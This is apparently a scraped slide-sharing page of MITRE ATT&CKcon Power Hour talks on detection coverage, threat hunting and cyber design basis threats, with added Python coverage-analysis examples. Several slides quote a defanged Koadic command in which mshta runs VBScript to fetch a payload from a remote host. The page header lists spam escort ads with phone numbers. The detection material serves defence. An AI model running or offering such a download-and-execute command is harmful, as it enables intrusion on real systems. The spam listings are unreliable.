Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxxIncident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
Incident Command System xxxxxxxxxxxxxxxxxxxxxxxxx
 
Climate change and occupational safety and health.
Climate change and occupational safety and health.Climate change and occupational safety and health.
Climate change and occupational safety and health.
 
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
Just Call Vip call girls Wardha Escorts ☎️8617370543 Starting From 5K to 25K ...
 
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance BookingCall Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
Call Girls Chakan Call Me 7737669865 Budget Friendly No Advance Booking
 
Climate change and safety and health at work
Climate change and safety and health at workClimate change and safety and health at work
Climate change and safety and health at work
 
2024 Zoom Reinstein Legacy Asbestos Webinar
2024 Zoom Reinstein Legacy Asbestos Webinar2024 Zoom Reinstein Legacy Asbestos Webinar
2024 Zoom Reinstein Legacy Asbestos Webinar
 
Global debate on climate change and occupational safety and health.
Global debate on climate change and occupational safety and health.Global debate on climate change and occupational safety and health.
Global debate on climate change and occupational safety and health.
 
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Room
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130  Available With RoomVIP Kolkata Call Girl Jatin Das Park 👉 8250192130  Available With Room
VIP Kolkata Call Girl Jatin Das Park 👉 8250192130 Available With Room
 
Call Girls Service Connaught Place @9999965857 Delhi 🫦 No Advance VVIP 🍎 SER...
Call Girls Service Connaught Place @9999965857 Delhi 🫦 No Advance  VVIP 🍎 SER...Call Girls Service Connaught Place @9999965857 Delhi 🫦 No Advance  VVIP 🍎 SER...
Call Girls Service Connaught Place @9999965857 Delhi 🫦 No Advance VVIP 🍎 SER...
 
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated  Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...Top Rated  Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
Top Rated Pune Call Girls Bhosari ⟟ 6297143586 ⟟ Call Me For Genuine Sex Ser...
 
Zechariah Boodey Farmstead Collaborative presentation - Humble Beginnings
Zechariah Boodey Farmstead Collaborative presentation -  Humble BeginningsZechariah Boodey Farmstead Collaborative presentation -  Humble Beginnings
Zechariah Boodey Farmstead Collaborative presentation - Humble Beginnings
 
Item # 4 - 231 Encino Ave (Significance Only).pdf
Item # 4 - 231 Encino Ave (Significance Only).pdfItem # 4 - 231 Encino Ave (Significance Only).pdf
Item # 4 - 231 Encino Ave (Significance Only).pdf
 
Regional Snapshot Atlanta Aging Trends 2024
Regional Snapshot Atlanta Aging Trends 2024Regional Snapshot Atlanta Aging Trends 2024
Regional Snapshot Atlanta Aging Trends 2024
 
2024: The FAR, Federal Acquisition Regulations - Part 29
2024: The FAR, Federal Acquisition Regulations - Part 292024: The FAR, Federal Acquisition Regulations - Part 29
2024: The FAR, Federal Acquisition Regulations - Part 29
 
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
VIP High Class Call Girls Amravati Anushka 8250192130 Independent Escort Serv...
 
2024: The FAR, Federal Acquisition Regulations - Part 28
2024: The FAR, Federal Acquisition Regulations - Part 282024: The FAR, Federal Acquisition Regulations - Part 28
2024: The FAR, Federal Acquisition Regulations - Part 28
 
Fair Trash Reduction - West Hartford, CT
Fair Trash Reduction - West Hartford, CTFair Trash Reduction - West Hartford, CT
Fair Trash Reduction - West Hartford, CT
 

MITRE ATTACKCon Power Hour - December

  • 2. Join us on Slack
  • 4. TABLE OF CONTENTS 01 ABOUT ME 02 INSPIRATION 03 IDEA 04 EXPECTATIONS 05 REALITY 06 FUTURE
  • 5. 01 ABOUT ME - Valentina Palacín @fierytermite
  • 6. VALENTINA PALACÍN @FIERYTERMITE Translator Threat Intelligence Analyst Threat Hunter & Python Developer in progress
  • 7. 02 INSPIRATION - How was the idea born?
  • 8. THREAT LIBRARY Knowledge Base for distilled and curated intelligence insights produced by CTI Research Teams & OSINT Sources.
  • 9. HOW CAN I LEVERAGE SOMETHING LIKE THIS IF I DON’T HAVE A DEDICATED TEAM?
  • 13. MY WISHLIST ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
  • 16. WHY DID I DO THIS TO MYSELF?
  • 18. SO FAR… ● Load DB with ATT&CK content ● Use TRAM to load new relationships ● Manually add adversary mappings ● Create more relationships (industries, dates, adversary types…) ● Explore relationships through GUI ● Edit selected data through GUI ● Edit relationships through GUI ● Export data to ATT&CK Navigator ● Dockerize everything for easy deployment
  • 19. /first-time
    git clone https://github.com/fierytermite/attack-navigator
    git clone --branch tmc https://github.com/fierytermite/tram-1
    git clone https://github.com/intelforge/tmc
    * Register and Login with the new user
  • 34. GOALS ● Create more relationships (dates, adversary types…) ● Manually load new mapping ● Edit relationships through UI ● Dockerize everything for easy deployment ● Add relational graphs to study the adversaries
  • 36. THANKS! Do you have any questions? @fierytermite linkedin.com/in/valentinapalacin. CREDITS: This presentation template was created by Slidesgo, including icons by Flaticon, and infographics & images by Freepik.
  • 37. From Theory to Practice: How My ATT&CKⓇ Perspectives Have Changed Katie Nickels ATT&CKcon Power Hour December 11, 2020
  • 38. Yes, this is being recorded. Yes, the slides will be shared. No, I don’t know when. Soon.
  • 39. About Me - Katie Nickels, Director of Intelligence, Red Canary, @LiketheCoins. § Former MITRE ATT&CK Team Member (relevant) § SANS Certified Instructor for FOR578: Cyber Threat Intelligence § Bringing context about threats to inform decisions § Maintaining sanity with exercise, chocolate, containers, and holiday lights
  • 41. How I've thought differently about ATT&CK: 1. Tracking tactics, techniques, and procedures 2. Defining detection coverage 3. Choosing what to detect
  • 43. Tracking TTPs the MITRE way https://attack.mitre.org/techniques/T1218/005/ Tactic: Defense Evasion Technique/Sub-technique: Signed Binary Proxy Execution: Mshta Procedure: Koadic can use MSHTA to serve additional payloads.[13]
  • 44. A Koadic detection at Red Canary Procedure... So what’s this?
  • 46. Example of tracking beyond TTPs: Defense Evasion/Execution; T1218.005 Signed Binary Proxy Execution: Mshta; Koadic used VBScript to launch mshta.exe and make an external network connection: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  • 47. Primary Tactic: Execution. Additional Tactics: TA0005 Defense Evasion. Techniques: T1218.005 Signed Binary Proxy Execution: Mshta; T1059.005 Command and Scripting Interpreter: Visual Basic. Procedure ★ Observable: Koadic uses VBScript to launch mshta.exe and make an external network connection. C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close). Detectors (Name / Targeted to this profile?): WIN-MSHTA-CLI-URL / No; WIN-MSHTA-NON-HTA / No; WIN-MSHTA-INLINE-VBSCRIPT / No
  • 48. What this format lets us do § Track detailed observables from endpoint telemetry § Identify where we have detection coverage (or not) § Use ATT&CK tactics, techniques, and sub-techniques ...but add on because it meets our needs
  • 50. Defining coverage by confidence https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
  • 51. The challenge of unlimited procedures “You should also remember that each ATT&CK technique may have many procedures for how an adversary could implement it — and because adversaries are always changing, we can’t know what all those procedures are in advance.” https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
  • 52. Katie: “There are unlimited procedures!” § Matt: “But are there?” o Think of techniques like MSHTA o Commands only have so many flags § We may be able to scope some technique variations
  • 54. Adding in variations (diagram: Tactics > Techniques/Sub-techniques > Variations > Procedures > Observables). Variations are specific options made available to an attacker as defined by the technical components involved that comprise a technique (working definition)
  • 55. Nine known variations for HTA 1. HTA can have any file name and extension 2. Specifying a URI from where HTA content is first downloaded 3. Use of scripting engines 4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”) 5. HTA content embedded and executed from within other file formats 6. HTA content can be executed remotely via UNC paths. 7. Remote HTA execution via COM interface (lateral movement) 8. HTA execution by double clicking or invoking with “explorer.exe foo.hta” 9. Full control over the path and filename of mshta.exe and rundll32.exe https://redcanary.com/blog/threat-research-questions
  • 56. Adding in variations: Defense Evasion/Execution; T1218.005 Signed Binary Proxy Execution: Mshta; Variation: Specifying protocol handler + direct download from URI; Koadic used VBScript to launch mshta.exe and make an external network connection: C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
  • 57. Mix and match the variations: Specifying protocol handler (vbscript:) + Direct download from URI (mshta hxxp[:]//8.8.8[.]8:123/); Specifying protocol handler (jscript:). https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
  • 58. Testing known variation combinations (granularity scale, less to more granular): 1 technique (T1218.005 Signed Binary Proxy Execution: Mshta) → 25 tested combinations
  • 59. Defining detection coverage by threat observables
  • 60. Remember that profile breakdown? Techniques: T1218.005 Signed Binary Proxy Execution: Mshta; T1059.005 Command and Scripting Interpreter: Visual Basic. Observable: Koadic uses VBScript to launch mshta.exe and make an external network connection. C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell").run("mshta hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close). Detectors (Name / Targeted to this profile?): WIN-MSHTA-CLI-URL / No; WIN-MSHTA-NON-HTA / No; WIN-MSHTA-INLINE-VBSCRIPT / No
  • 61. Mapping coverage based on threats (granularity scale, less to more granular): 1 technique (T1218.005 Signed Binary Proxy Execution: Mshta) → 6 threat observables for Mshta: Koadic observable 1, Koadic observable 2, FIN7 observable 1, FIN7 observable 2, Kovter observable 1, Lazarus observable 1
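One way to make the observable-level coverage on this slide concrete, as an added example (not Red Canary's or the presenter's code): a small classifier that labels Mshta process events with the variations named on the earlier slide, runs three detectors over them, and then reports coverage both as the single "is T1218.005 covered?" cell and as the per-observable breakdown. The three detector names come from the slides, but what each matches on here is an assumption; the process events are constructed, except the first, which is the Koadic observable quoted above with its URL left defanged.

```python
"""Detection coverage at observable granularity for T1218.005 (Mshta).

Added example, not Red Canary's or the presenter's code. The detector names
come from the slides; the logic attached to each is an assumption about what
such a detector looks for. Events are constructed, except the first, which is
the Koadic observable quoted on the slides (URL left defanged)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    threat: str              # profile this observable is attributed to
    image: str               # full path of the executed image
    original_file_name: str  # PE OriginalFileName; survives a renamed binary
    cmdline: str


# Constructed telemetry: six Mshta observables across four threats, like the
# "6 threat observables for 1 technique" breakdown on the slides.
EVENTS = [
    ProcessEvent("Koadic", r"C:\Windows\system32\mshta.EXE", "MSHTA.EXE",
                 r'C:\Windows\system32\mshta.EXE vbscript:CreateObject("WScript.Shell")'
                 r'.run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)'),
    ProcessEvent("Koadic", r"C:\Windows\system32\mshta.exe", "MSHTA.EXE",
                 "mshta.exe javascript:close()"),
    ProcessEvent("FIN7", r"C:\Windows\SysWOW64\mshta.exe", "MSHTA.EXE",
                 r"mshta.exe C:\Users\Public\invoice.txt"),
    ProcessEvent("FIN7", r"C:\Windows\system32\mshta.exe", "MSHTA.EXE",
                 r"mshta.exe \\fileserver\share\update.hta"),
    ProcessEvent("Kovter", r"C:\Windows\system32\mshta.exe", "MSHTA.EXE",
                 "mshta.exe about:blank"),
    ProcessEvent("Lazarus", r"C:\Users\Public\svc.exe", "MSHTA.EXE",
                 "svc.exe hxxp[:]//203.0.113[.]10/a.hta"),
]

URL_RE = re.compile(r"https?://\S+", re.I)
HANDLER_RE = re.compile(r'^"?(vbscript|javascript|jscript|about):', re.I)
UNC_RE = re.compile(r'^"?\\\\[^\\\s]+\\')
FILE_RE = re.compile(r'^"?([^\s"]+\.([a-z0-9]+))"?$', re.I)
STANDARD_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def refang(text):
    """Undo the hxxp / [.] / [:] defanging used on slides and in reports."""
    return text.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def variations(ev):
    """Variation labels (subset of the nine on the slides) visible in one event."""
    parts = refang(ev.cmdline).split(None, 1)
    args = parts[1].strip() if len(parts) > 1 else ""
    found = set()
    handler = HANDLER_RE.match(args)
    if handler:
        found.add("handler:" + handler.group(1).lower())       # variation 4
    is_url = bool(URL_RE.search(args))
    if is_url:
        found.add("download-from-uri")                         # variation 2
    if UNC_RE.match(args):
        found.add("unc-path")                                  # variation 6
    file_arg = FILE_RE.match(args)
    if file_arg and not handler and not is_url and file_arg.group(2).lower() != "hta":
        found.add("non-hta-extension")                         # variation 1
    image = ev.image.lower()
    if not image.startswith(STANDARD_DIRS) or not image.endswith("\\mshta.exe"):
        found.add("nonstandard-path")                          # variation 9
    return found


# Assumed logic for the three detector names on the slides.
DETECTORS = {
    "WIN-MSHTA-CLI-URL": lambda v: "download-from-uri" in v,
    "WIN-MSHTA-NON-HTA": lambda v: "non-hta-extension" in v,
    "WIN-MSHTA-INLINE-VBSCRIPT": lambda v: "handler:vbscript" in v,
}


def detectors_firing(ev):
    v = variations(ev)
    return sorted(name for name, pred in DETECTORS.items() if pred(v))


def coverage_report(events=EVENTS, technique="T1218.005"):
    """The one-cell answer ("is the technique covered?") next to the
    per-observable answer the slides argue for."""
    mshta = [e for e in events if e.original_file_name.upper() == "MSHTA.EXE"]
    rows = [(e.threat, sorted(variations(e)), detectors_firing(e)) for e in mshta]
    covered = [r for r in rows if r[2]]
    return {
        "technique": technique,
        "technique_covered": bool(covered),
        "observables_total": len(rows),
        "observables_covered": len(covered),
        "uncovered": [(threat, vars_) for threat, vars_, hits in rows if not hits],
    }


if __name__ == "__main__":
    for key, val in coverage_report().items():
        print(f"{key}: {val}")
```

On this constructed data the technique cell says "covered", while three of the six observables (the javascript: and about: handlers and the UNC path) trip no detector; that gap is what the observable-level view exposes and the technique-level view hides.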
  • 62. So how should we explain detection coverage?
  • 64. Diving deeper: Mshta threat observables (Koadic observable 1, Koadic observable 2, FIN7 observable 1, FIN7 observable 2, Lazarus observable 1) alongside HTA test harness results. These are okay too!
  • 65. Expressing coverage is just tough § Any way you express it will have limitations § There’s no “right” or “wrong” way to do it ...but there may be “better” ways for your needs § Figure out the requirement for what you’re doing o What are you trying to convey and achieve? o What’s your goal of expressing the coverage?
  • 67. Finding “good” detection opportunities § Not everything is useful for detection § Choosing is most of the battle https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
  • 68. § “Discovery techniques aren’t that useful for detection” https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf Discovery techniques
  • 69. § “...except when they are” Domain Trust Discovery with nltest
  • 70. § “This should NEVER happen in an environment, let’s write a detection analytic!” —Me in January 2020 § “Here’s a hypothesis that will probably be noisy so here are five ways to tune it when that happens.” —Me in December 2020 § If an analytic is noisy…how can we tune it? o Narrow it down? Use threat intelligence. o Easily suppress on false positives? Testing & tuning is most of the work https://redcanary.com/blog/tuning-detectors/
  • 72. Takeaways § Don’t limit yourself to just TTPs if you need to go further § Define detection coverage based on your requirements § Trial, error, and experience will help you choose what to detect § It’s a good thing to change your perspectives § Surrounding yourself with new people and new situations lets you think differently and mature
  • 74. Sharpening your Threat Hunting Program with ATT&CK Framework. Hieu Tran, Detection Team Lead | FPT Cybersecurity Division
  • 75. INDEX: Sharpening your Threat Hunting Program with ATT&CK framework. 01 Threat Hunting vs Threat Detection 02 Threat Hunting Methodology 03 MITRE ATT&CK - Threat Hunter Common Language 04 Case study 05 Key takeaways 06 Q&A
  • 76. Human-driven (and assisted by tools) practice of searching iteratively through data to detect advanced threats that evade traditional security controls
  • 77. Threat Hunting vs Threat Detection. Threat Hunting: DEFINITION • Proactive • Humans find bad stuff with the help of machines. PROs • Identifies detection gaps and drives the creation of new detections. CONs • Needs security experts for searching, hunting, etc. • Slow and expensive. Threat Detection: DEFINITION • Reactive • Automated with machines such as SIEM, IDS/IPS, AV, etc. PROs • Least expensive approach. CONs • Likely to miss something (False Negatives) • Too much time spent because of alert fatigue (False Positives)
  • 78. What are we looking for?
  • 79. NUMBERS TELL STORIES: GLOBAL DWELL TIME It takes so long to detect bad guys inside your organization. FireEye Mandiant M-Trends 2020 Special Report
  • 80. Threat Hunting Methodology 1. Target: Scope the data sets that will be used in your investigation. Hunts can branch from various starting points. 2. Hunt: Proactively and iteratively search through network and endpoint data to detect and isolate advanced threats that evade more traditional security solutions. 3. Disrupt: Seamlessly pivot from hunting to forensic analysis, in order to disrupt adversaries before they fully execute their attacks. These analyses can also generate new indicators that can be fed into complementary security systems, creating a valuable security feedback loop.
  • 81. MITRE ATT&CK - Threat Hunter Common Language
  • 83. Case Study: APT32 Threat Hunting and Incident Response against Cyber Espionage Threat Actors: APT32 – OceanLotus/SeaLotus/CobaltKitty. Our customer's situation at the time: • Large enterprise with a huge number of endpoints: ~1000 Servers, 6000 Workstations. • Core services (Active Directory, Email Server, Antivirus Management) already compromised. • Operations and security staff machines were compromised. IT IS CHAOS
  • 85. Case Study: APT32. Based on what we found on compromised servers/workstations, we built our hypothesis: • Gain Initial Access by using Spear Phishing to gather Valid (administrator) Accounts. • Execute malicious payloads with Living-off-the-land Binary (LOLBIN) techniques. • Maintain Persistence by installing a New Service or Registry Run Keys. • Stay under the radar (Defense Evasion) by Software Packing, DLL Hijacking, File Deletion… • Discovery by Network Service Scanning and Brute Forcing using custom malware/scripts. • C2 Communication using Commonly Used Ports (80, 443, 53)
  • 88. Case Study #1. We deployed independent hunting stacks: • Endpoint Detection & Response • Data lake (gathering all essential service logs, including DNS, Proxy, AD…) • Advanced Threat Detection • Network Detection & Response. We automated lots of work by leveraging OpenAPI: • Quickly deploy data acquisition scripts across the enterprise infrastructure. • Prevent active C2 connections with Endpoint Isolation and Binary Isolation. • Speed up cleaning of malware artifacts (removing binary files, executable files and registry run keys).
  • 89. Case Study #1. At the end of the day, we discovered: • 13 C2 domains and 12 C2 IPs: • 04 C2 domains had never been seen before. • 26 servers and 96 clients were compromised. • 09 UserSIDs were used to install malicious services. • Multiple malware artifacts, which could be divided into 03 groups: • Binary files (.exe and .dll files) • Scripts (PowerShell, C#, JScript, .NET) • Webshells (PHP Script) • C2 Payload (found in Registry)
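An added example (not FPT's code) of what one hunt step from the persistence hypothesis above looks like on data-lake output: stacking Windows System log event 7045 ("a service was installed") across the fleet to surface rare service binaries in user-writable locations, then pivoting to the accounts that installed them, which is the kind of pivot that yields the UserSID and host counts in the findings. All events, hosts, SIDs, service names and paths are constructed; the fleet size of 7000 is the ~1000 servers and 6000 workstations from the case study.

```python
"""Stacking new-service installs to test the persistence hypothesis.

Added example, not FPT's code. Events are constructed in the shape of Windows
System log event 7045 as a data lake might export it; hosts, SIDs, service
names and paths are made up."""
from collections import defaultdict

WELL_KNOWN_SIDS = {"S-1-5-18", "S-1-5-19", "S-1-5-20"}  # SYSTEM, LOCAL/NETWORK SERVICE
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\", "c:\\perflogs\\")
DOMAIN = "S-1-5-21-1111-2222-3333"  # constructed domain SID prefix


def ev(host, service, image_path, sid, event_id=7045):
    return {"host": host, "event_id": event_id, "service": service,
            "image_path": image_path, "sid": sid}


EVENTS = [
    # legitimate agent rollout by SYSTEM from Program Files: rare, but benign-looking
    ev("WS-0001", "BackupAgent", r"C:\Program Files\Vendor\agent.exe", "S-1-5-18"),
    ev("WS-0002", "BackupAgent", r"C:\Program Files\Vendor\agent.exe", "S-1-5-18"),
    ev("SRV-05", "BackupAgent", r"C:\Program Files\Vendor\agent.exe", "S-1-5-18"),
    # one service binary in ProgramData installed with a domain account on several hosts
    ev("SRV-01", "WinUpdateSvc", r"C:\ProgramData\wus\wus.exe", DOMAIN + "-1105"),
    ev("SRV-02", "WinUpdateSvc", r"C:\ProgramData\wus\wus.exe", DOMAIN + "-1105"),
    ev("WS-0012", "WinUpdateSvc", r"C:\ProgramData\wus\wus.exe", DOMAIN + "-1105"),
    ev("WS-0033", "NetSvcHelper", r"C:\Users\Public\nsh.exe", DOMAIN + "-2210"),
    # admin-installed tool in System32: a lead that needs triage rather than a verdict
    ev("SRV-09", "RemoteAdminSvc", r"C:\Windows\System32\rasvc.exe", DOMAIN + "-1001"),
    ev("SRV-10", "RemoteAdminSvc", r"C:\Windows\System32\rasvc.exe", DOMAIN + "-1001"),
    # a non-install service event that the filter must ignore
    ev("WS-0040", "Other", r"C:\Windows\System32\x.exe", "S-1-5-18", event_id=7036),
]


def norm_path(p):
    return p.strip('"').lower()


def stack_services(events):
    """Group 7045 events by normalized image path: which hosts, which installer SIDs."""
    by_path = defaultdict(lambda: {"hosts": set(), "sids": set()})
    for e in events:
        if e["event_id"] != 7045:
            continue
        rec = by_path[norm_path(e["image_path"])]
        rec["hosts"].add(e["host"])
        rec["sids"].add(e["sid"])
    return by_path


def hunt_leads(events, fleet_size, max_prevalence=0.01):
    """Service binaries that match at least two of: rare across the fleet,
    living in a user-writable directory, installed by a non-system account."""
    leads = []
    for path, rec in stack_services(events).items():
        reasons = []
        if len(rec["hosts"]) / fleet_size <= max_prevalence:
            reasons.append("rare")
        if path.startswith(USER_WRITABLE):
            reasons.append("user-writable path")
        if any(s not in WELL_KNOWN_SIDS for s in rec["sids"]):
            reasons.append("installed by a user account")
        if len(reasons) >= 2:
            leads.append({"image_path": path, "hosts": sorted(rec["hosts"]),
                          "sids": sorted(rec["sids"]), "reasons": reasons})
    # strongest leads first: more reasons, then wider spread
    return sorted(leads, key=lambda l: (-len(l["reasons"]), -len(l["hosts"])))


def installer_sids(events, leads):
    """Pivot: non-system accounts that installed any flagged service, with host counts."""
    flagged = {l["image_path"] for l in leads}
    hosts_by_sid = defaultdict(set)
    for e in events:
        if (e["event_id"] == 7045 and norm_path(e["image_path"]) in flagged
                and e["sid"] not in WELL_KNOWN_SIDS):
            hosts_by_sid[e["sid"]].add(e["host"])
    return {sid: len(hosts) for sid, hosts in hosts_by_sid.items()}


if __name__ == "__main__":
    found = hunt_leads(EVENTS, fleet_size=7000)
    for lead in found:
        print(lead["image_path"], lead["hosts"], lead["reasons"])
    print(installer_sids(EVENTS, found))
```

The threshold of two reasons is a tuning knob: the SYSTEM-installed vendor agent is rare but drops out, while the admin tool in System32 stays in as a lower-ranked lead, which is the trade-off between missed installs and triage load that the methodology slide's iterative hunt loop is meant to absorb.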
  • 91. We will be able to hunt at scale with: the right staff with the right skillsets; the right processes/procedures for hunting; the right technical solutions that enable hunters
  • 92. Key Takeaways 1. Assume-breach mindset. 2. Train your staff in threat hunter skillsets (or outsource). 3. Build a roadmap for implementing solutions properly.
  • 94. USING ATT&CK TO CREATE CYBER DBTS DR. JACOB BENJAMIN
  • 95. PREVIOUS ICS EXPERIENCE + Idaho National Laboratory + Areva NP + Duke Energy ABOUT THE PRESENTER JACOB BENJAMIN – DIRECTOR OF PROFESSIONAL SERVICES RESEARCH AREAS + Nuclear Cybersecurity + Cyber Risk Management + Wireless Security + Software-Defined Networking + Malware Analysis + Steganography Detection CREDENTIALS + Ph.D., Computer Science + M.S., Cybersecurity + B.S., Computer Science + CISSP
  • 96. + What is a DBT? + How are they developed? + What does a DBT look like? + Are there cyber DBTs? DESIGN BASIS THREAT (DBT) OVERVIEW
  • 97. “ATTEMPT OF THEFT OF A SIGNIFICANT AMOUNT OF NUCLEAR MATERIAL (E.G. 10KG OF PU) BY A GROUP OF 6 OUTSIDERS EQUIPPED WITH 10 KG TNT EXPLOSIVE, AUTOMATIC WEAPONS (INCLUDING LIGHT INFANTRY WEAPONS) AND SPECIFIC COMMERCIALLY AVAILABLE INTRUSION TOOLS. THEY HAVE A COMPREHENSIVE KNOWLEDGE OF THE FACILITY AND ASSOCIATED PHYSICAL PROTECTION MEASURES. WILLING TO DIE OR TO KILL. NO COLLUSION WITH INSIDER.” IAEA DBT WORKSHOP EXAMPLE DBT
  • 98. RESPONSE TIME VS ADVERSARY TASK TIME (timeline diagram; labels recovered from the slide): Adversary Task Time spans T0 (Adversary Begins Task) to Tc (Adversary Completes Task), with Sensing Opportunities along the way. After First Sensing, Detection Time runs until TD (Adversary Detected), leaving Adversary Task Time Remaining After 1st Sensing; Response Force Time then runs until Ti (Adversary Interrupted), leaving Time Remaining After Interruption. PPS Response Time spans Detection Time and Response Force Time.
  • 99. CYBER SECURITY FOR NUCLEAR POWER PLANTS. KEY DOCUMENTS • NEI 04-04, Voluntary Cyber Program • 10 CFR 73.54, The Cyber Rule • NEI 08-09, Cyber Security Plan • NEI 13-10, Cyber Security Assessments. CHALLENGES • Describing the cyber threat landscape • Modeling cyber-initiated events • Mal-operation vs malware. USING ATT&CK • Describe threat behavior • Conduct adversary emulation • Evaluate actual events & case studies. Cybersecurity risk mitigation for nuclear power plants began in 2002 and 2003, when the NRC included cybersecurity requirements in the Physical Security and Design Basis Threat Orders.
  • 100. USING TRADITIONAL DBT ANALYSIS FOR CYBER. PAST CYBER EVENTS: Nuclear sector, Energy sector, ICS overall. CREDIBLE THREAT INTELLIGENCE: Dragos World View Bulletins, CISA / ICS-CERT, Vendors. SITE SPECIFIC TARGETS: Crown Jewel Analysis, Consequence-based targeting
  • 101. EXAMPLE CYBER DBT DEVELOPMENT. Targets: SIS, Turbines, Generators. Past Events: CrashOverride, Trisis, Stuxnet. Threat Intel: World View, CISA, Vendors
  • 102. CYBER DBT RESULT: ATTEMPT TO CAUSE A LOSS OF SAFETY IMPACT. ADVERSARY HAS BEEN KNOWN TO USE DRIVE-BY COMPROMISE, EXTERNAL REMOTE SERVICES, VALID ACCOUNTS, SUPPLY CHAIN COMPROMISE, AND ICS-TAILORED MALWARE. THEY HAVE DESTRUCTIVE CAPABILITIES, UNDERSTAND PROCESS IMPLICATIONS, AND HAVE SPECIFIC KNOWLEDGE OF INDUSTRIAL CONTROL SYSTEMS. WILLING TO CAUSE PHYSICAL HARM OR KILL. NO COLLUSION WITH INSIDER.
  • 103. LEVERAGING CYBER DBTS: ASSESSING MITIGATION COVERAGE
    TTP    | Name                     | Mitigations
    T0822  | External Remote Services | M1042, M1035, M1032, M1030
    T0859  | Valid Accounts           | M1047, M1037, M1032, M1027, M1026, M1018
    T0817  | Drive-by Compromise      | M1021
    T0862  | Supply Chain Compromise  | M1049, M1016
    S0013  | Trisis                   | M1049, M1035, M1040, M1038, M1030
  • 104. LEVERAGING CYBER DBTS: ASSESSING MITIGATION COVERAGE (mitigation → DBT techniques/software it addresses): M1032 Multi-factor Authentication → T0859 Valid Accounts, T0822 External Remote Services; M1049 Antivirus / Antimalware → S0013 Trisis, T0862 Supply Chain Compromise; M1021 Restrict Web-Based Content → T0817 Drive-by Compromise
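An added example (not the presenter's or Dragos's code) that turns the TTP-to-mitigation table above into a coverage check: given the mitigations a site has actually implemented, which DBT entries remain uncovered, and what is the smallest set of mitigations that addresses every entry. The table is copied from the slide; the example site configurations passed to the functions are made up.

```python
"""Mitigation coverage for the cyber DBT on the slides.

Added example, not the presenter's or Dragos's code. DBT_TTPS is the
TTP-to-mitigation table from the slide; the cover search and the sample
implemented-mitigation sets are constructed here."""
from itertools import combinations

DBT_TTPS = {
    "T0822": ("External Remote Services", {"M1042", "M1035", "M1032", "M1030"}),
    "T0859": ("Valid Accounts", {"M1047", "M1037", "M1032", "M1027", "M1026", "M1018"}),
    "T0817": ("Drive-by Compromise", {"M1021"}),
    "T0862": ("Supply Chain Compromise", {"M1049", "M1016"}),
    "S0013": ("Trisis", {"M1049", "M1035", "M1040", "M1038", "M1030"}),
}


def coverage_by_mitigation(ttps=DBT_TTPS):
    """Invert the table: mitigation ID -> DBT entries it addresses."""
    inverted = {}
    for ttp, (_, mitigations) in ttps.items():
        for m in mitigations:
            inverted.setdefault(m, set()).add(ttp)
    return inverted


def gaps(implemented, ttps=DBT_TTPS):
    """DBT entries that none of the implemented mitigations addresses."""
    implemented = set(implemented)
    return {ttp for ttp, (_, mitigations) in ttps.items() if not (mitigations & implemented)}


def minimum_cover(ttps=DBT_TTPS):
    """Smallest set of mitigations that addresses every DBT entry.

    Exhaustive search over subsets by increasing size; fine for a DBT-sized
    table (a handful of entries, tens of mitigations), not for all of ATT&CK."""
    candidates = sorted(coverage_by_mitigation(ttps))
    for size in range(1, len(candidates) + 1):
        for combo in combinations(candidates, size):
            if not gaps(combo, ttps):
                return set(combo)
    return set()


def report(implemented, ttps=DBT_TTPS):
    """Coverage summary for one site's implemented mitigations."""
    missing = gaps(implemented, ttps)
    return {"covered": len(ttps) - len(missing), "total": len(ttps),
            "gaps": sorted((t, ttps[t][0]) for t in missing)}


if __name__ == "__main__":
    print("minimum cover:", sorted(minimum_cover()))
    print("site with MFA and AV only:", report({"M1032", "M1049"}))
```

For this table the minimum cover is exactly the three mitigations the next slide singles out: M1021 is the only option for T0817, and among the rest only M1032 reaches both T0822 and T0859 while only M1049 reaches both T0862 and S0013. A greedy pick-the-most-TTPs heuristic can land on a four-mitigation answer here because several mitigations tie at two entries, which is why the search is exhaustive.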
